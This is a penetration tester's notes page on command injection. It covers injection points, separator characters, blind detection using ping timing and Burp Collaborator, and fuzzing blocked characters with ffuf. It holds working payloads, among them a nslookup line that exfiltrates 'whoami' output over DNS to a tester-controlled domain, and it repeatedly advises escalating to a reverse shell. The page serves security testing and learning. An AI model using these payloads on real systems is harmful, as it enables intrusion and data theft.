Cmd Injection

Where Would You Find Command Injection

  • In the following places:

  • Text boxes that take in input

  • Hidden URLs that take input

  • E.g. /execute/command-name

  • Or through queries e.g. /location?parameter=command

  • When using URLs, remember to URL encode the characters that aren’t accepted

  • Hidden ports:

  • Some frameworks open debug ports that take in arbitrary commands

Overview

  • Use command line symbols within the input to alter the executed command

  • Pay close attention to functions within an application that tend to be performed by an OS command

  • Two forms exist, blind command injection --> you do not see the returned output, and non-blind cmd injection --> the system command output gets returned back to you

  • Ensure you use the proper system commands per the OS

cat vs type 
ping -c vs ping -n #ping -n causes an infinte ping loop in linux
ls vs dir

  • Try to start with reading a world readable file

Non-Blind CMD Inj.

  • At the most basic level:

  • Use command line symbols within the input to alter the executed command

  • Once you have identified a potential injection point, use command line symbols within the input to alter the executed command 

; | || & && > >>

  • Once you have exploited non-blind cmd injection, escalate to a reverse shell.

Blind CMD Injection

Identification

  • ICMP and DNS are useful to determine blind cmd injection 

google.com; ping -c11 127.0.0.1 #server will hang for roughly 10 seconds

  • Can also try to ping yourself, however many corporate environments have firewalls in place to stop this, so doesn't always mean blind cmd injection isn't taking place

  • Use tcpdump to capture the icmp echo requests.

  • This proves blind cmd injection, escalate to reverse shell

Burp Collaborator

  • Launch Burp, and choose:

Burp --> Burp Collaborator Client
Press --> "Copy to Clipboard" #to copy a randomly generated domain name
Execute your cmd injection

  • Press Poll Now to see if the request came through

  • If the above worked, move down to Data Exfil section

Data Exfil via DNS and Burp Collaborator

  • Once you have your Burp Collaborator Domain, try your command injection 

google.com; a=$(whoami|base32|tr -d =); nslookup $a.COLLAB_DOMAIN_NAME.com

  • Press Poll now and you should have something returned like this:

O53XOLLEMF2GCCQ.323lijijf90304jklksjru43k23.oastify.com

  • Then type the following in your local terminal 

echo -n O53XOLLEMF2GCCQ | wc -c

  • If this fails as Invalid Base32 add 1, or 2 equal signs at the end for padding

echo -n O53XOLLEMF2GCCQ= | base32 -d
#output:
www-data

Bypassing Character Blocklist with ffuf

  • If you see that some special characters are banned, create a burp request to the resource you want to test

  • It should be a post request

  • Identify the parameter that it is using to post the data to the server 

name=;ls

  • Swap out the command injection attempt that is getting blocked in the burp request with:

name=FUZZ

  • Save the burp request to your local machine in a file 

ffuf -request search.request --request-proto http -w /opt/Seclists/Fuzzing/special-chars.txt

  • You usually will have to ignore the & character as many webservers will think you are going to pass in another parameter

  • Now that you have your results back you must filter out the most common side that you see being returned

  • -fs 724

  • Can comma seperate filter size i.e. you see alot of 724 and 726 returned saying that character you posted is blocked

  • -fs 724,726

  • Ensure you also -mc all or match code to see all the different http status codes returned, look for 5XX errors

  • If you see errors on:

{ == SSTI
; | & == cmd injection
' " == SQLI
PreviousAuthentication BypassNextJavascript Vulnerabilities

Last updated